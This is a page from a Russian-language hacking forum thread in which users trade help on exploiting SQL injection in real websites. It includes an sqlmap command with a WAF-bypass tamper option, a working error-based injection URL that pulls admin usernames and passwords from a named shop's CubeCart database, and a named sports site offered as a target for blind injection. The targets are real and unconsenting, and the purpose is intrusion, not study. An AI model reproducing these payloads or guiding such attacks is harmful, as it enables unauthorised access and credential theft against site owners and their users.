Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

Page 68 of 151
  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ка обойти?
     
    #1341 Sensoft, 3 Sep 2016
  2. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Выше кидал ссылку на набор тамперов, пробуй задрачивать
     
    #1342 pw0ned, 3 Sep 2016
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    А как через них херачить ?
     
    #1343 Sensoft, 3 Sep 2016
  4. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    --tamper=name

    не легче оставить ссылку на ресурс ?
     
    #1344 pw0ned, 3 Sep 2016
  5. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    У тебя есть скайп ?
     
    #1345 Sensoft, 3 Sep 2016
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    в лс глянь
     
    #1346 Sensoft, 3 Sep 2016
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    А на счёт тампера я сделал так --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py файл подписал инпут расширение поставил внутрь засунул скрипт но идёт ошибка
    Code:
    [13:58:10] [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script 'C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py'
    А вод полный запрос
    Code:
    sqlmap -u www.site.ru/ --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py --dbs
     
    #1347 Sensoft, 3 Sep 2016
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select(concat(username,0x3a,password))from(CubeCart_admin_users)limit+0,1))))
     
    _________________________
    #1348 winstrool, 3 Sep 2016
    BabaDook likes this.
  9. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    [​IMG]
    не фурычит
     
    #1349 r1l, 3 Sep 2016
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Попробуйте всё таки браузером обработать сылку
     
    #1350 BabaDook, 3 Sep 2016
  11. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    еслиб я умел(
     
    #1351 r1l, 3 Sep 2016
  12. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    очень много сайтов раскручивает подбором по символов, как с этим бороться?(
     
    #1352 r1l, 3 Sep 2016
    Last edited: 4 Sep 2016
  13. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Видимо никто не понял вопроса.. Я в том числе
     
    #1353 pw0ned, 4 Sep 2016
  14. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    хелп
    не раскручивает(
    крутил как --dbms=MySQL --level=5 --risk=3 --random-agent
    уязвимость точно есть, но не могу раскрутить(
    Code:
    http://www.fckladionica.com:80/allnews.php?page=%5c&rc=497
     
    #1354 r1l, 4 Sep 2016
  15. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Он имеет введу слепую иньекцию
     
    #1355 Sensoft, 4 Sep 2016
    r1l likes this.
  16. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Чувак там кажись WAF, это тот ещё геморой
     
    #1356 Sensoft, 4 Sep 2016
  17. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Софтом крути - не парься
     
    #1357 Zen1T21, 4 Sep 2016
  18. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Запара в том, если сервер слабый ты можешь ждать месяцами чтобы он все столбцы вывел )
     
    #1358 Sensoft, 4 Sep 2016
  19. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Не геморой, если умеешь обходить :)
     
    #1359 pw0ned, 4 Sep 2016
  20. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    обход сложный?
     
    #1360 r1l, 4 Sep 2016
(You must log in or sign up to post here.)
Page 68 of 151
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.